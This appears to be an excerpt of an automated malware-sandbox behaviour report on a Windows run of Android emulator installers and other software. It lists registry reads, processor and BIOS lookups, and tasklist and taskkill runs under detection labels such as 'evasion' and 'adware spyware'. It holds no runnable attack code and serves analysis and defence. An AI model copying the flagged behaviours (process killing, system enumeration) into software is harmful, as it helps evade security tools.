Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000002 C:\Windows\system32\mmc.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName C:\Windows\system32\mmc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A C:\Windows\system32\mmc.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs C:\Windows\system32\DrvInst.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Program Files\Npcap\NPFInstall.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName C:\Windows\system32\mmc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 C:\Windows\system32\mmc.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\system32\DrvInst.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000002 C:\Windows\system32\DrvInst.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\UpperFilters C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000001 C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 C:\Windows\system32\mmc.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\system32\mmc.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A\ C:\Program Files\Npcap\NPFInstall.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Phantom C:\Windows\system32\mmc.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A\ C:\Program Files\Npcap\NPFInstall.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\Control C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Service C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 C:\Program Files\Npcap\NPFInstall.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A C:\Program Files\Npcap\NPFInstall.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\LowerFilters C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 C:\Windows\system32\mmc.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000001 C:\Windows\system32\DrvInst.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Windows\system32\DrvInst.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000\LogConf C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A\ C:\Program Files\Npcap\NPFInstall.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A C:\Program Files\Npcap\NPFInstall.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName C:\Windows\system32\mmc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 C:\Windows\system32\svchost.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Phantom C:\Windows\system32\DrvInst.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A C:\Program Files\Npcap\NPFInstall.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000001 C:\Windows\system32\mmc.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000a1a8d825d9cc14480000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000a1a8d8250000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900a1a8d825000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1da1a8d825000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000a1a8d82500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\system32\vssvc.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\is-PKQAV.tmp\smartgaga-android-emulator-1.1.646.1-installer_pD-oKg1.tmp N/A
Key opened \Registry\Machine\Hardware\Description\System\CentralProcessor C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Wireshark\Wireshark.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\FeatureSet C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\VendorIdentifier C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 C:\Program Files\Wireshark\Wireshark.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Wireshark\dumpcap.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString C:\Program Files\Wireshark\Wireshark.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Wireshark\dumpcap.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString C:\Program Files\Wireshark\dumpcap.exe N/A
Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor C:\Program Files\Wireshark\dumpcap.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\BlueStacksInstaller.exe N/A
Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 F:\BlueStacks X\BlueStacks X.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Wireshark\dumpcap.exe N/A
Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor C:\Program Files\Wireshark\dumpcap.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 F:\BlueStacks X\BlueStacks X.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 F:\LDPlayer\LDPlayer9\dnplayer.exe N/A
Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\runonce.exe N/A
Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor C:\Program Files\Wireshark\dumpcap.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor C:\Program Files\Wireshark\dumpcap.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor C:\Program Files\Wireshark\dumpcap.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Wireshark\dumpcap.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe N/A
Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor C:\Program Files\Wireshark\Wireshark.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString C:\Program Files\Wireshark\dumpcap.exe N/A
Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor C:\Program Files\Wireshark\dumpcap.exe N/A
Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor C:\Program Files\Wireshark\dumpcap.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Wireshark\dumpcap.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Wireshark\dumpcap.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor C:\Program Files\Wireshark\dumpcap.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\Downloads\AnyDesk.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor C:\Program Files\Wireshark\dumpcap.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Identifier C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor C:\Program Files\Wireshark\dumpcap.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString C:\Program Files\Wireshark\dumpcap.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\Downloads\AnyDesk.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\BlueStacksInstaller.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\runonce.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ F:\BlueStacks X\BlueStacks X.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\BlueStacksInstaller.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString F:\BlueStacks X\BlueStacks X.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 C:\Program Files\Wireshark\dumpcap.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor C:\Program Files\Wireshark\dumpcap.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString C:\Program Files\Wireshark\dumpcap.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Wireshark\Wireshark.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor C:\Program Files\Wireshark\dumpcap.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\BlueStacksInstaller.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString F:\LDPlayer\LDPlayer9\dnplayer.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor C:\Program Files\Wireshark\dumpcap.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor C:\Program Files\Wireshark\dumpcap.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString C:\Program Files\Wireshark\dumpcap.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Wireshark\dumpcap.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 C:\Program Files\Wireshark\dumpcap.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ C:\Users\Admin\AppData\Local\Temp\is-PKQAV.tmp\smartgaga-android-emulator-1.1.646.1-installer_pD-oKg1.tmp N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION F:\LDPlayer\LDPlayer9\dnplayer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\ldnews.exe = "11001" F:\LDPlayer\LDPlayer9\dnplayer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\dnplayer.exe = "11001" F:\LDPlayer\LDPlayer9\dnplayer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Windows\explorer.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Program Files\ReasonLabs\EPP\rsWSC.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Program Files\McAfee\WebAdvisor\updater.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Program Files\McAfee\WebAdvisor\updater.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Program Files\McAfee\WebAdvisor\ServiceHost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Program Files\ReasonLabs\EPP\rsWSC.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Program Files\ReasonLabs\EPP\rsWSC.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Program Files\ReasonLabs\EPP\rsWSC.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133641910590834886" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Program Files\McAfee\WebAdvisor\updater.exe N/A
